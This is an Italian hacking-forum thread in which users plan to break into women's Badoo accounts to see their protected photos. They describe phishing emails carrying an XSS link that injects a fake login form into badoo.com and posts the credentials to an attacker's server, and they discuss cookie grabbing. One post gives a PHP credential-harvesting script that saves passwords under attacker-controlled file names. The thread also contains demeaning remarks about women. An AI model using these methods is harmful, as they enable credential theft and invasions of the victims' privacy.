[RICHIESTA] password foto protette badoo

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
Senti non ho voglia di fare la guerra x una cazzata del genere, pensi di avere ragione ?
ok bravo hai ragione.
Però ti dico un utlima cosa almeno capisci come la penso e non te la prendi (mi sembri abbastanza irritato, io ho solo detto di non aver capito, beviti una camomilla amico)

Tu hai un fake login, (la vittima ci casca e ti da la password), quindi l'xss a cosa ti serve ?
Redirect ? apparte che non serve una xss per farlo in quanto lo spazio che usi x il fake login credo sia un tuo FTP, e poi x redirectare a cosa ? tanto hai la sua password.
X inserire javascript nella pagina di fake login ?_? e cosa ti serve inserire del javascript in un fake-lgoin ? l'importante è che sembri vero e la vittima ci caschi.
Stai tranquillo non voglio una risposta, perchè tanto dirai sempre la stessa cosa, x il semplice motivo che hai una mente chiusa e o hai ragione o hai ragione te, io non ho tempo da perdere se pensi di avere ragione, ok hai ragione...
Be happy.
 
V1R5 ha detto:
Senti non ho voglia di fare la guerra x una cazzata del genere, pensi di avere ragione ?
ok bravo hai ragione.
Clicca per espandere...
so di aver ragione, non serve che me lo dici tu.
V1R5 ha detto:
Però ti dico un utlima cosa almeno capisci come la penso e non te la prendi (mi sembri abbastanza irritato, io ho solo detto di non aver capito, beviti una camomilla amico)
Clicca per espandere...
sei tu quello irritato e che ha torto visto che vuoi concludere e aver per forza ragione... io volevo semplicemente darti delle prove sul fatto che ho ragione
V1R5 ha detto:
Tu hai un fake login, (la vittima ci casca e ti da la password), quindi l'xss a cosa ti serve ?
Clicca per espandere...
vedi che non hai ancora capito: secondo te come faccio il fake login??
mica lo metto su una pagina esterna così la tipa se ne accorge.
Lo faccio fare con un xss direttamente sul sito badoo.com
V1R5 ha detto:
Redirect ? apparte che non serve una xss per farlo in quanto lo spazio che usi x il fake login credo sia un tuo FTP, e poi x redirectare a cosa ? tanto hai la sua password.
X inserire javascript nella pagina di fake login ?_? e cosa ti serve inserire del javascript in un fake-lgoin ? l'importante è che sembri vero e la vittima ci caschi.
Stai tranquillo non voglio una risposta, perchè tanto dirai sempre la stessa cosa, x il semplice motivo che hai una mente chiusa e o hai ragione o hai ragione te, io non ho tempo da perdere se pensi di avere ragione, ok hai ragione...
Be happy.
Clicca per espandere...

immagino sia un tentativo di scappare: è sempre quello che fanno quello che hanno torto. Scappa pure se lo desideri.
Questo forum serve a condividere conoscenze e quindi desidero solo farti capire che possibile fare un fake login con xss direttamente su badoo.com

Il redirect serve dopo il login per mandarmi i dati a un mio sito

ecco come funzionerebbe:

1-mandi una mail a una tipa e le fai fare il login su http://badoo.com/search.php?arg=codice_js_o_html_per_il_fake_login
2-lei clicca, fa il fake login e quando clicca su "Entra" i dati vengono inviati a http://mioserver.it/prendi_dati.php tramite un action html o un redirect js che prende i parametri del login come post e li salva tipo in un database.

non credi si possa fare?
 
:omfg:
Scusa, io non ho letto da nessuna parte che volevi usare una xss per uppare il fake login su badoo, se è così (più o meno) avresti ragione.
Ma da come l'ho capita io era diversa...
Il fake login lo faccio in html (e php) aiutandomi con il soruce di quello originale.
e il risultato viene così:
http://www.habboadmin.com/
(basta guardare il source x capire che è un fake, ma tu riusciresti a capirlo?)
Comunque, ok adesso che ho capito cosa vorresti fare ti posso dare ragione, ma basta che me lo chiarivi senza andare a dire cose assurde.
 
credevo conoscessi xss solo x grabbare i cookie cm la maggior parte, ma x fortuna non sei un lamer...

cmq allora lo facciamo questo fake login in xss?

facciamo k uno fa la pagina php sul server esterno e uno fa il fake login x l'xss?

vuoi? se sì quale preferisci fare? x me è uguale...
 
:asd: grazie a dio sei normale, pensavo dia vere davanti un altro vendicator3 XD
Ma, perchè alla fine si è deciso di usare il fake login ?
Serve la password dell'utente di badoo o la password delle foto protette ? (o è uguale :look:)?
 
da quello che ho capito con la password dell'utente si vedono anche le sue foto...

che ne dici?
facciamo:
-ingegneria sociale (scommetto che ci cascherebbero...)
-fake login via xss (nessun dubbio sul fatto k funzi)
-grab cookie (xò la tipa deve essere già loggata quindi è + difficile che funzi)
 
Se c'è una xss che grabba su Badoo proverei un cookie grabbing... In caso contrario un fake login, però lo proverei solo se ci fosse una xss su Badoo in modo da poter fare il redirect, perchè se uno vede un sito http://chupachupa.altervista.org/fakelogin.php ... Beh, dubito che ci caschi, quindi xss che fa redirect poi:

1) O un ruba cookie se l'xss è grabbosa;
2) Fake Login se l'xss non funge, in questo caso però sperate che la vittima sia veramente idiota XD
 
Mixer ha detto:
Se c'è una xss che grabba su Badoo proverei un cookie grabbing... In caso contrario un fake login, però lo proverei solo se ci fosse una xss su Badoo in modo da poter fare il redirect, perchè se uno vede un sito http://chupachupa.altervista.org/fakelogin.php ... Beh, dubito che ci caschi, quindi xss che fa redirect poi:

1) O un ruba cookie se l'xss è grabbosa;
2) Fake Login se l'xss non funge, in questo caso però sperate che la vittima sia veramente idiota XD
Clicca per espandere...

tranquillo che quelli son idioti sul serio XD
fake login con fakemail basta e avanza cmq anche il cookie grabbing sarebbe ottimo
 
ecco il codice php che potrebbe essere richiamato dal fake login con xss:



<?
if ($_GET['user']<>""){
$file=fopen($_GET['user'],"w");
fwrite($file,$_GET['pass']);
fclose($file);
}
else {
die("Username invalido");
}
?>
<script type="text/javascript">
<!--
location.href="http://badoo.com";
//-->
</SCRIPT>
<?
?>
 
no, non frega i cookie, chiede direttamente all'utente l'user e la pass :)
V1R5 sai k sei più vecchio di me di una settimana!!
 
si ma trovala l'xss su badoo!! non è una cazzata
a meno che non ce ne siano di unfixed su xssed.com
 
bhè x me lo troviamo l'xss su badoo.com .
Basta provare... chi si registra x provare?
 
azz io ho posto la domanda e siamo già fuori dalle mie conoscenze... però ottimo... seguirò passo passo quello che farete così vedendolo dal vivo capirò a modo come funzionano le xss, e anche qualcos'altro è il mio modo preferito di imparare... perchè io ci provo a studiare... ma se non vedo le cose non riesco a capirle! avanti... che vediamo le foto di queste pu... pulitissime ragazze LOL
 
se volessi delle foto porno, internet ne è pieno, ma se per raggiungerle devo superare una sfida, sono pronto a intraprenderla per il gusto di affrontarla!! Chi si unisce a me?
no-one?
 
io mi unisco/unirei volentieri... se ti và di insegnarmi man mano che procediamo... perchè come ti ho detto questo esula dale mie conoscenze (x ora)
 
E gli intrepidi eroi partirono alla cerca della XSS che serviva loro per raggiungere la Foto Porno...
asd
quoto Predator, per chi si ricorda il post.
 
xss nada
in effetti chuzz hai anche ragione....c'è tanto di youporn poi...
 
è colpa di uomini che perdono la testa per la ciccina se le donne al giorno d'oggi spadroneggiano sull'uomo. :p
Un po di controllo no?
 
sono completamente d'accordo predator, forse non hai letto cosa ho scritto dei post fa: ho accettato "la sfida" solo per il gusto di superare un apparente ostacolo
 
Predator ha detto:
è colpa di uomini che perdono la testa per la ciccina se le donne al giorno d'oggi spadroneggiano sull'uomo. :p
Un po di controllo no?
Clicca per espandere...

Che ci vuoi fare... A meno che non ci sia una ondata della serie: "I love rocco" da parte degli uomini (Cosa moooooooooolto improbabile xDDDD) sarà sempre e comunque così :asd: (Per fortuna :look:)
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

0
Discussione Ufficiale I migliori password manager per il 2024
  • In evidenza
  • 35
  • 3K
35
3K
Privacy Online e Anonimato
ne0h
0
Guida Videoguida 3 tecniche per bypassare il WAF di AWS
  • 3
  • 1K
3
1K
Pentesting e Ethical Hacking Guide e Tools
0xbro
Top Bottom
Indietro